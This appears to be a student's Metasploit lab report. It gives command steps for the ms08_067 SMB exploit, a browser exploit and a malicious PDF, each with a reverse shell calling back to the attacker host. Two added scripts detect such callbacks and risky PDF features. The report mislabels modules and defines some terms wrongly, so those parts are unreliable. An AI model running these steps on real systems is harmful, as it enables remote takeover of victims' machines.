2017-2018-2 20155231 "Network Countermeasure Technology" Experiment 5: MSF Basic Application


Experimental content

An active attack practice, e.g. ms08_067

  1. Start the msf console: msfconsole

  2. Use the search command to find the module for this vulnerability: search ms08_067

  3. The exploit module's path is exploit/windows/smb/ms08_067_netapi; it consists of four parts: module type, target platform, target service and module name.

use exploit/windows/smb/ms08_067_netapi

  4. View the available payloads:
    show payloads

  5. Select the attack payload:
    set payload generic/shell_reverse_tcp

  6. View the configuration items the exploit requires:
    show options

  7. View the target platforms the exploit module can successfully attack:
    show targets

  8. Set the target IP (the default port is 445):
    set RHOST 192.168.241.138
  9. After success, connect back to port 5231 on the attacking host:
    set LPORT 5231
    set LHOST 192.168.241.134
  10. The target type here is 5 (this system has no Data Execution Prevention (DEP)):
    set target 5

  11. Check that the option values are correct after setting them:
    show options

  12. Launch the exploit:
    exploit

  13. View the result:
    ipconfig /all
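Seen from the victim side, the part of this procedure that leaves the clearest trace is the callback in steps 9 and 12: after the exploit fires, the victim opens an outbound TCP connection to LHOST 192.168.241.134 on LPORT 5231, from a process that normally never dials out. The script below is an added example for this write-up, not code from the lab or from Metasploit. It takes network-connection records in a layout that imitates a Sysmon Event ID 3 entry and flags callbacks that look like a reverse shell. All records are constructed; the process baselines (INTERPRETERS, SERVICE_HOSTS) and the port allowlist are assumptions for a generic Windows host, and the statement that the Server service targeted by ms08_067 runs inside svchost.exe is stated in a comment as the assumption the rule rests on.

```python
"""Flag reverse-shell-style callbacks in host network-connection events.

Added example for this write-up; not code from the lab or from Metasploit.
The record layout imitates a Sysmon Event ID 3 (network connection) entry,
but every record below is constructed, not captured from the lab machines.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Assumed baseline: command interpreters are never the process that opens an
# outbound TCP connection on a workstation or file server.
INTERPRETERS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

# Assumed baseline: service-host processes accept connections but do not dial
# out to arbitrary ports (assumption: the Server service targeted by
# ms08_067 runs inside svchost.exe, so its payload's socket is owned there).
SERVICE_HOSTS = {"svchost.exe", "services.exe", "lsass.exe", "spoolsv.exe"}

# Assumed allowlist of destination ports this host is expected to connect to.
EXPECTED_DST_PORTS = {53, 80, 88, 135, 139, 389, 443, 445}


@dataclass
class ConnEvent:
    ts: str
    image: str        # process that owns the socket
    src_ip: str
    dst_ip: str
    dst_port: int
    initiated: bool   # True: this host opened the connection (outbound)


def classify(ev: ConnEvent) -> List[Tuple[str, str]]:
    """Return (severity, reason) pairs for one event; empty means nothing noteworthy."""
    findings = []
    if not ev.initiated:
        return findings                     # inbound connections are not judged here
    image = ev.image.lower()
    unusual_port = ev.dst_port not in EXPECTED_DST_PORTS
    if image in INTERPRETERS:
        findings.append(("high", f"command interpreter opened an outbound connection to port {ev.dst_port}"))
    if image in SERVICE_HOSTS and unusual_port:
        findings.append(("high", f"service host dialled non-standard port {ev.dst_port}"))
    elif unusual_port and image not in INTERPRETERS:
        findings.append(("low", f"non-standard destination port {ev.dst_port}"))
    return findings


def triage(events: List[ConnEvent]) -> List[Dict[str, object]]:
    """Return an alert for every event that carries at least one high-severity finding."""
    alerts = []
    for ev in events:
        findings = classify(ev)
        if any(sev == "high" for sev, _ in findings):
            alerts.append({"ts": ev.ts, "image": ev.image,
                           "dst": f"{ev.dst_ip}:{ev.dst_port}",
                           "reasons": [reason for _, reason in findings]})
    return alerts


# Constructed records using the lab's addresses: victim 192.168.241.138,
# attacker (LHOST) 192.168.241.134, LPORT 5231.
SAMPLE_EVENTS = [
    # Callback from the exploited service to LHOST:LPORT.
    ConnEvent("10:00:01", "svchost.exe", "192.168.241.138", "192.168.241.134", 5231, True),
    # Ordinary browsing: nothing to report.
    ConnEvent("10:00:02", "chrome.exe", "192.168.241.138", "93.184.216.34", 443, True),
    # The exploit request itself arriving on SMB (inbound, so skipped here).
    ConnEvent("10:00:00", "svchost.exe", "192.168.241.134", "192.168.241.138", 445, False),
    # A shell dialling out directly.
    ConnEvent("10:00:05", "cmd.exe", "192.168.241.138", "192.168.241.134", 5231, True),
    # An updater on an odd port: noted at low confidence only.
    ConnEvent("10:00:07", "updater.exe", "192.168.241.138", "203.0.113.10", 8443, True),
]


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Only the two callbacks to 192.168.241.134:5231 become alerts; the updater on port 8443 is kept at low severity because an unusual port on its own is weak evidence, which is why the rules combine the port with the identity of the process that opened the socket.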

A browser-targeted attack, e.g. ms11_050

Here is an IE browser vulnerability found on the Internet: ms14_064 (we are different)

  1. First enter search ms14_064 to find the vulnerability

  2. To attack the browser, enter use exploit/windows/browser/ms10_046_shortcut_icon_
  3. Enter show payloads to view the payloads to choose from; the one used in this experiment is set payload generic/shell_reverse_tcp
  4. show options shows what needs to be configured
  5. Enter set SRVHOST 192.168.241.134
    set LHOST 192.168.241.134
    set LPORT 5231
  6. Enter exploit to generate the URL

  7. Access the URL on the Windows side
  8. On the Kali side, enter sessions; you can see a connection with ID 1
  9. Then enter sessions -i 1 to attach to the session with ID 1, enter the shell, and obtain it successfully.

A client-side attack, e.g. Adobe

  1. First search with search adobe

  2. Then select use windows/fileformat/adobe_flashplayer_button

  3. Then set payload windows/meterpreter/reverse_tcp and use show options to view the information to be configured

  4. LHOST, LPORT and FILENAME need to be configured
  5. Enter exploit to generate the pdf file

  6. Enter use exploit/multi/handler and set the listening port and host

  7. exploit starts listening
  8. On the Windows side, open 20155231.pdf; the connection back succeeds

(We are different... I tried many templates but only succeeded once, and have no screenshots yet. Most attempts look like this: the connection does not succeed and the port is not opened.)
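The file produced in step 5 only works if the victim opens it, so the defensive counterpart of this section is triaging a PDF before it is opened. The script below is an added example for this write-up, not code from the lab or from Metasploit. It scans raw PDF bytes for the name objects that give a document active behaviour (open-time actions, JavaScript, launch actions, embedded rich media such as Flash), and it also handles two things a naive grep misses: names hidden with #xx hex escapes (/Jav#61Script) and names that only appear inside FlateDecode-compressed streams. The risky-name table is a generic heuristic, the sample files are constructed here, and whether the 20155231.pdf generated in the experiment contains these exact markers is not something this example verifies.

```python
"""Static triage of a PDF for the features used by client-side exploits.

Added example for this write-up; not code from the lab or from Metasploit.
The risky-name table is a generic heuristic; the sample files are constructed
here and are not the 20155231.pdf generated in the experiment.
"""
import re
import zlib
from typing import Dict

# PDF name objects that give a document active behaviour. Their presence is
# not proof of malice, but a file from an untrusted source carrying several
# of them deserves a closer look before it is opened.
RISKY_NAMES: Dict[bytes, str] = {
    b"/JavaScript": "JavaScript action",
    b"/JS": "inline JavaScript code",
    b"/OpenAction": "action triggered when the document opens",
    b"/AA": "additional actions (automatic triggers)",
    b"/Launch": "launches an external program",
    b"/RichMedia": "embedded rich media such as Flash",
    b"/EmbeddedFile": "embedded file attachment",
}


def unescape_names(data: bytes) -> bytes:
    """Undo #xx hex escapes in name objects, e.g. /Jav#61Script -> /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data: bytes) -> bytes:
    """Return the decompressed bodies of all FlateDecode streams (others are skipped)."""
    bodies = []
    for m in re.finditer(rb"stream\r?\n(.*?)\r?\nendstream", data, re.S):
        try:
            bodies.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass            # not Flate-compressed (or damaged): ignore
    return b"\n".join(bodies)


def triage_pdf(data: bytes) -> Dict[str, str]:
    """Map each risky name found (in plain or inflated content) to its description."""
    views = [unescape_names(data), unescape_names(inflate_streams(data))]
    findings: Dict[str, str] = {}
    for view in views:
        for name, desc in RISKY_NAMES.items():
            # Require a delimiter after the name so /JS does not match /JSX etc.
            if re.search(re.escape(name) + rb"(?![A-Za-z0-9])", view):
                findings[name.decode()] = desc
    return findings


# Constructed samples (not real files from the lab).
SAMPLE_CLEAN = (b"%PDF-1.4\n"
                b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
                b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
                b"%%EOF\n")

SAMPLE_SUSPECT = (b"%PDF-1.6\n"
                  b"1 0 obj << /Type /Catalog /OpenAction 3 0 R >> endobj\n"
                  b"3 0 obj << /S /Jav#61Script /JS (app.alert(1)) >> endobj\n"
                  b"4 0 obj << /Subtype /RichMedia >> endobj\n"
                  b"5 0 obj << /Filter /FlateDecode >> stream\n"
                  + zlib.compress(b"<< /S /Launch >>")
                  + b"\nendstream endobj\n%%EOF\n")


if __name__ == "__main__":
    for label, blob in (("clean", SAMPLE_CLEAN), ("suspect", SAMPLE_SUSPECT)):
        print(label, triage_pdf(blob))
```

For the constructed suspect file the result lists /OpenAction, /JavaScript (recovered from the escaped name), /JS, /RichMedia and /Launch (recovered from the compressed stream); the clean file yields nothing. A document that opens with an action and embeds rich media is exactly the shape a reader-targeting exploit takes, so a mail gateway or endpoint check that runs this kind of scan stops the step 8 "open the pdf" before it happens.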

Successful application of any auxiliary module

  1. Use show auxiliary to view the auxiliary modules (we are different)

  2. Select scanner/http/title to scan webpage titles
  3. View the configuration and set LHOST 192.168.241.134

  4. Enter exploit to start it

The display is as shown. But I don't know where the title is recorded, or what use this vulnerability is.

Questions answered after the experiment

  1. Explain in your own words what exploit, payload and encode are.
  • An exploit is an execution vulnerability.
  • A payload is the load carried: a carrier template that executes the code.
  • Encode is encoding: disguising our program or code.

Practice summary and experience

Because my computer's configuration is a bit weak, running the two virtual machines together made it lag, so I used a classmate's computer to do the experiment. Those who succeed are all alike; those who fail are each different. I looked at the problems and solutions other students ran into in the experiment. Some are resolved, some are still not resolved...

What technologies or steps are still missing for real-world use?

Many files generated from vulnerabilities get detected and removed by the "housekeeper" (antivirus). Achieving the connection back in real-world use is a problem, and so is inducing the target machine to perform the operations.


Origin http://43.154.161.224:23101/article/api/json?id=325178138&siteId=291194637